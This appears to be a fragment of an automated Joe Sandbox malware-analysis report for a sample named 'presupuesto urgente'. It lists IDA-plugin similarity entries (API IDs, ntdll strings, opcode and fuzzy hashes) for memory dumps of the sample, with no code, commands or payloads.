                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                                      • Opcode ID: af1971d70b88e77e7f355ab665f545e8984ae14fdfa3273d355732759286dafe
                                                                                                                                                      • Instruction ID: 0a7fd237b041eb2cb2fceccb0a42de272eec97c179f9fcaa05eba6d56f8cd440
                                                                                                                                                      • Opcode Fuzzy Hash: af1971d70b88e77e7f355ab665f545e8984ae14fdfa3273d355732759286dafe
                                                                                                                                                      • Instruction Fuzzy Hash: FC8139B2D012699BEB65CB54DC45BDEB7B8AF48710F0041EAA919B7240E7709E85CFA0
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                      • String ID: D&Nr
                                                                                                                                                      • API String ID: 4281723722-3640875199
                                                                                                                                                      • Opcode ID: 7a12dde954c23eaa3c97782394df1a30c7c5a0155184c9c56be0852fc13aee35
                                                                                                                                                      • Instruction ID: 3d67a1a26e4e3dc51537ee7b1cf7f8fc34b67b30e92493a00ad88d25ab6f5868
                                                                                                                                                      • Opcode Fuzzy Hash: 7a12dde954c23eaa3c97782394df1a30c7c5a0155184c9c56be0852fc13aee35
                                                                                                                                                      • Instruction Fuzzy Hash: 363112B5E00219EFCB05EFA8E884A9DBBF1AB88721F11456AE911F7384DB315901CF50
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                                      • Opcode ID: 428a5eb5e096a9712c10d2bc124d2ddc2471087a02baac0021fe7cc9e5311740
                                                                                                                                                      • Instruction ID: 2ed835f39bb3ea6f72b6deb96dc248042e9f88aa92e22e7b17ece8791e816e8f
                                                                                                                                                      • Opcode Fuzzy Hash: 428a5eb5e096a9712c10d2bc124d2ddc2471087a02baac0021fe7cc9e5311740
                                                                                                                                                      • Instruction Fuzzy Hash: DD911471B45741AFE315DF25F840B2ABBB9BF84A40F440A59E884DBAD1DB34E841CB92
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 33599F2E
                                                                                                                                                      • LdrpCheckModule, xrefs: 33599F24
                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 33599F1C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                                      • Opcode ID: 4fe0c2847518d531636431dcf6939c702593eb72e5dcef3c410eac93382e88cb
                                                                                                                                                      • Instruction ID: e1c573a27fbaae915f02d65c1cd7f4d74fef693125606fb53675b6c15ff8be85
                                                                                                                                                      • Opcode Fuzzy Hash: 4fe0c2847518d531636431dcf6939c702593eb72e5dcef3c410eac93382e88cb
                                                                                                                                                      • Instruction Fuzzy Hash: 6971E375E002059FFB04DF68D890BAEB7F4EB84718F19486EE842E7650E778A942CB50
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 5ade754e335976c97514b42275901dbf554f106aaa13472b0824754d742d43d6
                                                                                                                                                      • Instruction ID: 504c4110ca486ebc3e19eba14b6b987a58c40bc3874085d87b88dc18e43ca263
                                                                                                                                                      • Opcode Fuzzy Hash: 5ade754e335976c97514b42275901dbf554f106aaa13472b0824754d742d43d6
                                                                                                                                                      • Instruction Fuzzy Hash: 65519C347086169FEB0CCE18CE92A19BBE2FB89394B1441ADD946CB710DB71AC49CF81
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 99a225c857e0f1fca1a469a25b286981f4bd3870f3bd6026dadcd5e2fe8ea2d9
                                                                                                                                                      • Instruction ID: 440f19ed069d9cb5d7185898b30a193f3a637fe5a46dd26702a64157804296f8
                                                                                                                                                      • Opcode Fuzzy Hash: 99a225c857e0f1fca1a469a25b286981f4bd3870f3bd6026dadcd5e2fe8ea2d9
                                                                                                                                                      • Instruction Fuzzy Hash: FE5134B6E002189FDF05CF99E845ADDBBF5BF88354F05812AE806BB250E7359901DF50
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      • Opcode ID: 29df1e39077abf335cec40fb0c1008ff5f101cac1a40d005fdf0ecf0cd523479
                                                                                                                                                      • Instruction ID: bc95dbca79629330728cd5b3bf3a1d28cbac79baa595427cb09cf40e06951571
                                                                                                                                                      • Opcode Fuzzy Hash: 29df1e39077abf335cec40fb0c1008ff5f101cac1a40d005fdf0ecf0cd523479
                                                                                                                                                      • Instruction Fuzzy Hash: 56327774D02329CFEB22CF64D884BD9BBB4BF4A324F4448E9D449A7640DB749A84CF91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: ${]3
                                                                                                                                                      • API String ID: 0-3851408445
                                                                                                                                                      • Opcode ID: 65c2ec91fe5b910826c9b4c6b8349df9b1a71d9ca8f1f0ef0ed480214e044e56
                                                                                                                                                      • Instruction ID: ec726c785b8bdd4449a125fa5bf580e767962408df97539088f265ca7bb46c4e
                                                                                                                                                      • Opcode Fuzzy Hash: 65c2ec91fe5b910826c9b4c6b8349df9b1a71d9ca8f1f0ef0ed480214e044e56
                                                                                                                                                      • Instruction Fuzzy Hash: C0B18971A093029FD710CF29E880B1BBBE9EF84755F544A6EF994CB2A0D730D944CB92
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0$Flst
                                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                                      • Opcode ID: d44b422d49ca8223da7267a0bc0a80bb7f0db01dcca0f9d2320152fcd1151801
                                                                                                                                                      • Instruction ID: 3781ac5e455cfdbb621622ec8c44b0ae65c42fa68da7ac686a45be01bfaccb18
                                                                                                                                                      • Opcode Fuzzy Hash: d44b422d49ca8223da7267a0bc0a80bb7f0db01dcca0f9d2320152fcd1151801
                                                                                                                                                      • Instruction Fuzzy Hash: B951ADB5E00648CFEB25CF98E48475EFBF8EF4475AF18942ED4459B240EB709981CB80
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33530586
                                                                                                                                                      • kLsE, xrefs: 335305FE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                                      • Opcode ID: 460d4d379d66b200a3a951c3709d8eb29246a19d5d4add403ab8266808ef9843
                                                                                                                                                      • Instruction ID: 8c1f9d738b3a7f2dccd761732d9703dc40a6988e2897b7e751c71edafd2ddb67
                                                                                                                                                      • Opcode Fuzzy Hash: 460d4d379d66b200a3a951c3709d8eb29246a19d5d4add403ab8266808ef9843
                                                                                                                                                      • Instruction Fuzzy Hash: 9E51C0B6A02745DFE714DFA4E4407AAB7F8AF46320F04883ED5D6C7640E7789505CBA2
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ^R3
                                                                                                                                                      • API String ID: 3446177414-2450060645
                                                                                                                                                      • Opcode ID: 391fef6bbadf3a811220b1cf0177434d2ab06cc7bd888ed6a1d2137969dc3eb9
                                                                                                                                                      • Instruction ID: 8f1147ab3258376e3b8c7e30dcff5ad3118322a55e0bf436f2a9bc6f820b17a5
                                                                                                                                                      • Opcode Fuzzy Hash: 391fef6bbadf3a811220b1cf0177434d2ab06cc7bd888ed6a1d2137969dc3eb9
                                                                                                                                                      • Instruction Fuzzy Hash: 1E416BBAA00201DFDB15CF29E4846557BF9FF99750B54846AEC48DB3A0DB31E891CBA0
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: 0$0
                                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                                      • Opcode ID: 13026843a63ff97798e20665525631ab7915980dca31afaefb5c70af52631024
                                                                                                                                                      • Instruction ID: 8ebef19b2be562674ec061bee50c0ae3fca1b200a68071952432bba37a9bdada
                                                                                                                                                      • Opcode Fuzzy Hash: 13026843a63ff97798e20665525631ab7915980dca31afaefb5c70af52631024
                                                                                                                                                      • Instruction Fuzzy Hash: 21415BB5A087459FD300CF28E454A5ABBE4FF88354F044A6EF988DB340D771EA46CB96
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • D&Nr, xrefs: 335CAAD1
                                                                                                                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 335CAABF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: D&Nr$NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                                      • API String ID: 3446177414-1343951190
                                                                                                                                                      • Opcode ID: 189004b327aed19cd7d0587dd1a47dc54c561fc568190d3db0fc19af924f3a53
                                                                                                                                                      • Instruction ID: 459660154020a3feb9a5301bce0e6e34118b9b5d893dedafd8a1f36634447f4c
                                                                                                                                                      • Opcode Fuzzy Hash: 189004b327aed19cd7d0587dd1a47dc54c561fc568190d3db0fc19af924f3a53
                                                                                                                                                      • Instruction Fuzzy Hash: DC3135B6E00288EFD701DF64DD40F9ABBF9FB84B14F158269E915E7684C7389800CB90
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: R3$mR3
                                                                                                                                                      • API String ID: 3446177414-4232059398
                                                                                                                                                      • Opcode ID: 22bf28df7fdbedb097e882a12610c58f4a58d5d142b2b388ab11873a40fbca4d
                                                                                                                                                      • Instruction ID: 2366bfd4f20830831a24763fdba841aeed34a033d6ba41374f669381fdca4e8d
                                                                                                                                                      • Opcode Fuzzy Hash: 22bf28df7fdbedb097e882a12610c58f4a58d5d142b2b388ab11873a40fbca4d
                                                                                                                                                      • Instruction Fuzzy Hash: 3011B0B6A01218AFDB11CF98D885ADEBBB8EF4C360F10401AF911B7240D735AA54CBA0